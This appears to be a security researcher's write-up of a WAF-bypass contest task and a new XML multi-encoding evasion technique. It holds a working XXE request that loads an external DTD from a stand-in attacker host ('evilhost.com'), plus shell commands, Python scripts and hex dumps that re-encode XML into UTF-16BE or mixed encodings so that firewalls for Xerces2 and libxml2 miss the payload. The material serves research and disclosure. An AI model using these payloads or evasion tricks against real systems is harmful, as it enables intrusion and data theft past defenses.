POST / HTTP/1.1
Host: d3rr0r1m.waf-bypass.phdays.com
Connection: close
Content-Type: text/xml
User-Agent: Mozilla/5.0
Content-Length: 149

<?xml version="1.0"?>
<!DOCTYPE root [
    <!ENTITY % xxe SYSTEM "http://evilhost.com/waf.dtd">
    %xxe;
]>
<root>
    <method>test</method>
</root>

Request that exploited XXE from the contest

One of the solutions to this task was to encode the XML from the POST’s body into UTF-16BE without a BOM:

cat original.xml | iconv -f UTF-8 -t UTF-16BE > payload.xml

In this document, the organizer’s WAF didn’t see anything dangerous and processed the request.
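The same re-encoding can be done without iconv. The sketch below is a Python equivalent of the command above; the byte signature it searches for is a made-up stand-in for a naive ASCII-based filter, not the rule used by any real WAF.

```python
ORIGINAL = b"""<?xml version="1.0"?>
<!DOCTYPE root [
    <!ENTITY % xxe SYSTEM "http://evilhost.com/waf.dtd">
    %xxe;
]>
<root>
    <method>test</method>
</root>
"""

# Python's "utf-16-be" codec writes no BOM, like `iconv -t UTF-16BE`.
payload = ORIGINAL.decode("utf-8").encode("utf-16-be")

# A filter that looks for ASCII byte patterns no longer finds anything.
signature = b"<!ENTITY"
print("signature in original:", signature in ORIGINAL)
print("signature in payload: ", signature in payload)
print(payload[:12].hex(" "))
```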

New Technique: WAF Bypass by using Two Encodings

There is a way to confuse a WAF by encoding XML using two encodings simultaneously.

When a parser reads the encoding from the XML declaration, it immediately switches to it, even when the new encoding isn’t compatible with the encoding in which the XML declaration was written.

I didn’t find a WAF that supports parsing such multi-encoded documents.

Xerces2 Java Parser

The XML-declaration is in ASCII, the root element is in UTF-16BE:

00000000	3C3F 786D 6C20 7665 7273 696F 6E3D 2231	<?xml version="1
00000010	2E30 2220 656E 636F 6469 6E67 3D22 5554	.0" encoding="UT
00000020	462D 3136 4245 223F 3E00 3C00 6100 3E00	F-16BE"?>.<.a.>.
00000030	3100 3300 3300 3700 3C00 2F00 6100 3E	1.3.3.7.<./.a.>

Commands for encoding your XML:

echo -n '<?xml version="1.0" encoding="UTF-16BE"?>' > payload.xml
echo -n '<a>1337</a>' | iconv -f UTF-8 -t UTF-16BE >> payload.xml

libxml2

libxml2 switches the encoding immediately after it reads it from the “attribute”. Therefore, we need to change the encoding before closing the declaration:

00000000	3C3F 786D 6C20 7665 7273 696F 6E3D 2231	<?xml version="1
00000010	2E30 2220 656E 636F 6469 6E67 3D22 5554	.0" encoding="UT
00000020	462D 3136 4245 2200 3F00 3E00 3C00 6100	F-16BE".?.>.<.a.
00000030	3E00 3100 3300 3300 3700 3C00 2F00 6100	>.1.3.3.7.<./.a.
00000040	3E	>

Commands for encoding your XML:

echo -n '<?xml version="1.0" encoding="UTF-16BE"' > payload.xml
echo -n '?><a>1337</a>' | iconv -f UTF-8 -t UTF-16BE >> payload.xml
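Both variants can also be built in a few lines of Python instead of echo and iconv. The function names are assumptions made for this sketch; the resulting bytes match the two hex dumps above.

```python
def xerces_variant(body: str) -> bytes:
    """Whole declaration in ASCII, everything after it in UTF-16BE."""
    declaration = b'<?xml version="1.0" encoding="UTF-16BE"?>'
    return declaration + body.encode("utf-16-be")


def libxml2_variant(body: str) -> bytes:
    """Switch to UTF-16BE right after the encoding value, before '?>'."""
    declaration = b'<?xml version="1.0" encoding="UTF-16BE"'
    return declaration + ("?>" + body).encode("utf-16-be")


for build in (xerces_variant, libxml2_variant):
    payload = build("<a>1337</a>")
    print(build.__name__, len(payload), "bytes")
    # Print the payload in rows of 16 bytes, similar to the dumps above.
    for offset in range(0, len(payload), 16):
        print(f"{offset:08X}", payload[offset:offset + 16].hex(" ").upper())
```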

Afterword

The technique was discovered on September 5th, 2017. The first publication of this material was on Habr (in Russian) on October 13th, 2017.

Nicolas Grégoire released a similar technique for Xerces2 and UTF-7 on Twitter on October 12th, 2017, which is why I published this article on Habr less than 24 hours later.

In addition to UTF-7, UTF-8, and UTF-16, you can use many different encodings, but you should take into account your parser’s capabilities.